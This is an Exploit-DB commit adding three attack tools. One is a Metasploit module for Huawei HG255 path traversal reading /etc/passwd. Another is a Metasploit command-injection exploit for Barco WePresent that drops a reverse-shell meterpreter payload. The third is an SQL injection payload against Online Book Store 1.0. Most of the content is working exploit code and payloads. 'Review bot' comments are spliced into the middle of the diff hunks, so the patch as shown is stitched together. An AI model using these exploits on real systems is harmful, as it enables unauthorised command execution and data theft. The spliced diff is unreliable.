From dbb38f4b3a73c63df6d832fc516be510891eafe6 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 16 Jan 2020 05:02:06 +0000
Subject: [PATCH] DB: 2020-01-16
3 changes to exploits/shellcodes
Barco WePresent - file_transfer.cgi Command Injection (Metasploit)
Online Book Store 1.0 - 'bookisbn' SQL Injection
Huawei HG255 - Directory Traversal ( Metasploit )
---
exploits/hardware/webapps/47923.rb | 57 ++++++++++++++++
exploits/linux/remote/47924.rb | 105 +++++++++++++++++++++++++++++
exploits/php/webapps/47922.txt | 58 ++++++++++++++++
files_exploits.csv | 3 +
4 files changed, 223 insertions(+)
create mode 100755 exploits/hardware/webapps/47923.rb
create mode 100755 exploits/linux/remote/47924.rb
create mode 100644 exploits/php/webapps/47922.txt
diff --git a/exploits/hardware/webapps/47923.rb b/exploits/hardware/webapps/47923.rb
new file mode 100755
index 000000000..857fa8396
--- /dev/null
+++ b/exploits/hardware/webapps/47923.rb
@@ -0,0 +1,57 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#
+##
+
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize
+ super(
+ 'Name' => 'Huawei HG255 Directory Traversal',
+ ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’,
+ ‘Author’ => ‘Ismail Tasdelen’,
+ ‘License’ => MSF_LICENSE,
+ ‘References’ =>
+ [
+ ['CVE', '2017-17309' ],
+ ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
+ ]
+ )
+ register_options(
+ [
+ Opt::RPORT(80)
+ ], self.class
+ )
+ end
+
+ def run
+ urllist=[
+ ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+ ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+ ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+ ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’]
+
+ urllist.each do |url|
+ begin
+ res = send_request_raw(
+ {
+ ‘method’=> ‘GET’,
+ ‘uri’=> url
+ })
+
+ if res
+ print_good(“Vulnerable! for #{url}”)
+ else
+ print_status(“Vulnerable(no response) detected for #{url}”)
+ end
+ rescue Errno::ECONNRESET
+ print_status(“Vulnerable(rst) detected for #{url}”)
+ rescue Exception
+ print_error(“Connection failed.”)
+ end
+ end
+ end
\ No newline at end of file
diff --git a/exploits/linux/remote/47924.rb b/exploits/linux/remote/47924.rb
new file mode 100755
index 000000000..59aba88a5
--- /dev/null
+++ b/exploits/linux/remote/47924.rb
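Review bot: The module as committed will not parse: from the `‘Description’` line onward the hash keys, the `urllist` entries and the `print_*` messages use typographic quotes (‘ ’ “ ”), which Ruby does not recognise as string delimiters, and the hunk's last line is the `end` that closes `run` with no `end` following for `class MetasploitModule`. Replacing the curly quotes with ASCII `'`/`"` and appending a final `end` is needed before anything else in the file can be exercised. The result logic in `run` is also misleading: `if res` prints "Vulnerable!" for any HTTP response at all, including a 404 from a device that is not affected, so the branch should at least consult `res.code` before reporting success. `rescue Exception` swallows interrupts and `SystemExit` along with network errors; `rescue StandardError` (or the framework's `Rex::ConnectionError`) is the conventional form.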
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => "Barco WePresent file_transfer.cgi Command Injection",
+ 'Description' => %q(
+ This module exploits an unauthenticated remote command injection
+ vulnerability found in Barco WePresent and related OEM'ed products.
+ The vulnerability is triggered via an HTTP POST request to the
+ file_transfer.cgi endpoint.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' => 'Jacob Baines', # @Junior_Baines'
+ 'References' =>
+ [
+ ['CVE', '2019-3929'],
+ ['EDB', '46786'],
+ ['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']
+ ],
+ 'DisclosureDate' => "Apr 30, 2019",
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_CMD, ARCH_ARMLE],
+ 'Privileged' => false,
+ 'Targets' => [
+ ['Unix In-Memory',
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Type' => :unix_memory,
+ 'Payload' => {
+ 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }
+ }],
+ ['Linux Dropper',
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_ARMLE,
+ 'CmdStagerFlavor' => ['printf', 'wget'],
+ 'Type' => :linux_dropper]
+ ],
+ 'DefaultTarget' => 1,
+ 'DefaultOptions' => {
+ 'SSL' => true,
+ 'RPORT' => 443,
+ 'CMDSTAGER::FLAVOR' => 'printf',
+ 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
+ }))
+ end
+
+ def filter_bad_chars(cmd)
+ cmd.gsub!(/;/, 'Pa_Note')
+ cmd.gsub!(/\+/, 'Pa_Add')
+ cmd.gsub!(/&/, 'Pa_Amp')
+ return cmd
+ end
+
+ def send_command(cmd, timeout)
+ vars_post = {
+ file_transfer: 'new',
+ dir: "'#{filter_bad_chars(cmd)}'"
+ }
+
+ send_request_cgi({
+ 'uri' => '/cgi-bin/file_transfer.cgi',
+ 'method' => 'POST',
+ 'vars_post' => vars_post
+ }, timeout)
+ end
+
+ def check
+ check_resp = send_command(";whoami;", 5)
+ unless check_resp
+ return CheckCode::Unknown('Connection failed.')
+ end
+
+ if check_resp.code == 200
+ check_resp.body.gsub!(/[\r\n]/, "")
+ if check_resp.body == "root"
+ return CheckCode::Vulnerable
+ end
+ end
+
+ CheckCode::Safe
+ end
+
+ def execute_command(cmd, _opts = {})
+ send_command(";(#{cmd})&", nil)
+ end
+
+ def exploit
+ case target['Type']
+ when :unix_memory
+ execute_command(payload.encoded)
+ when :linux_dropper
+ execute_cmdstager(linemax: 128)
+ end
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47922.txt b/exploits/php/webapps/47922.txt
new file mode 100644
index 000000000..3faaddf07
--- /dev/null
+++ b/exploits/php/webapps/47922.txt
@@ -0,0 +1,58 @@
+# Exploit Title: Online Book Store 1.0 - 'bookisbn' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-15
+# Exploit Author: AmirHadi Yazdani (Ertebat Gostar Co.)
+# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
+# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
+# Version: 1.0
+# Tested on: Ubuntu 16.04
+# CVE: N/A
+
+-------------- Vulnerable code in book.php ( Line 1-25) -----------------------------------------------
+ $book_isbn = $_GET['bookisbn']; // vulnerable param
+ // connecto database
+ require_once "./functions/database_functions.php";
+ $conn = db_connect();
+
+ $query = "SELECT * FROM books WHERE book_isbn = '$book_isbn'"; // Injectable Point
+ $result = mysqli_query($conn, $query);
+ if(!$result){
+ echo "Can't retrieve data " . mysqli_error($conn);
+ exit;
+ }
+
+ $row = mysqli_fetch_assoc($result);
+ if(!$row){
+ echo "Empty book";
+ exit;
+ }
+
+ $title = $row['book_title'];
+ require "./template/header.php";
+?>
+
+
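Review bot: `filter_bad_chars` rewrites its argument in place with `gsub!`, so `send_command` mutates whatever string the caller handed it (`payload.encoded` in `execute_command`, the literal in `check`) and would raise `FrozenError` the day the file gains `# frozen_string_literal: true`; the non-destructive `cmd.gsub(';', 'Pa_Note').gsub('+', 'Pa_Add').gsub('&', 'Pa_Amp')` yields the same value without the side effect. The same pattern appears in `check`, where `check_resp.body.gsub!(/[\r\n]/, "")` alters the response object only to compare it; `check_resp.body.delete("\r\n") == "root"` reads more directly. The meaning of the `Pa_Note`/`Pa_Add`/`Pa_Amp` tokens is undocumented — presumably the target's CGI maps them back to the original characters, since `check` sends `;whoami;` through the filter and still expects `root` — and a one-line comment on `filter_bad_chars` stating that would spare the next reader a trip to the reference. `execute_command` also passes `nil` as the timeout through `send_command` to `send_request_cgi`; whether the HTTP client treats `nil` as "no timeout" or trips on it depends on the framework version, so it is worth confirming or passing an explicit value.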

Books >

// results goes here
+-------------------------------------------------------------------------------------------------------------------
+
+Exploit POC :
+
+# Parameter: bookisbn (GET)
+# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+# Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)
+
+#Payload:
+http://site.com/book.php?bookisbn=123' AND (SELECT 9724 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9724=9724,1))),0x71717a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.Tables GROUP BY x)a) AND 'aJYp'='aJYp
+
+-----------------------
+Other Vulnerable Pages with Same vulnerability :
+
+[PAGE :bookPerPub.php], [PARAM : pubid ], [Method : GET], [Vulnerable Code : Line 6 & Line 16]
+
+[PAGE :edit_book.php], [PARAM : publisher ], [Method : POST], [Vulnerable Code : Line 13 & Line 27 & Line 31]
+
+[PAGE :checkout.php , Function : getBookByIsbn , Defined in database_functions.php], [PARAM : $isbn ], [Method : SESSION], [Vulnerable Code : Line 30 & Line 26 in database_functions.php]
+
+and other pages .... :)
+
+Also you can have more fun with Other XSS bugs too :)
+----
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b68b21f9d..1c47b4565 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
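Review bot: The advisory quotes the injectable line `$query = "SELECT * FROM books WHERE book_isbn = '$book_isbn'";` but never states the remediation a reader of the file would expect next to the finding: the value from `$_GET['bookisbn']` should be bound through a prepared statement (`mysqli_prepare` with `bind_param`) rather than interpolated into the SQL string, and the same applies to the `pubid`, `publisher` and `$isbn` parameters listed at the end. The closing "Other XSS bugs" remark names no page or parameter, so it cannot be checked from this file. The "Line 1-25" label on the code excerpt presumably refers to book.php as shipped; the hunk itself does not show the surrounding lines.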
@@ -17929,6 +17929,7 @@ id,file,description,date,author,type,platform,port
 47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware,
 47889,exploits/linux/remote/47889.txt,"ASTPP VoIP 4.0.1 - Remote Code Execution",2020-01-08,"Fabien AUNAY",remote,linux,
 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java,
+47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42222,3 +42223,5 @@ id,file,description,date,author,type,platform,port
 47914,exploits/php/webapps/47914.txt,"Digi AnywhereUSB 14 - Reflective Cross-Site Scripting",2020-01-13,"Raspina Net Pars Group",webapps,php,
 47917,exploits/hardware/webapps/47917.txt,"IBM RICOH InfoPrint 6500 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
 47918,exploits/hardware/webapps/47918.txt,"IBM RICOH 6400 Printer - HTML Injection",2020-01-14,"Ismail Tasdelen",webapps,hardware,
+47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Sepahan TelCom IT Group",webapps,php,
+47923,exploits/hardware/webapps/47923.rb,"Huawei HG255 - Directory Traversal ( Metasploit )",2020-01-15,"Ismail Tasdelen",webapps,hardware,
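Review bot: The author recorded for 47922 in the second hunk, `"Sepahan TelCom IT Group"`, does not match the `# Exploit Author: AmirHadi Yazdani (Ertebat Gostar Co.)` header in the advisory this same commit adds, so the index and the file disagree on attribution; one of the two should be corrected. The other two new rows (47923 credited to "Ismail Tasdelen", 47924 to Metasploit) are consistent with their files' headers and the 2020-01-15 date matches the advisory.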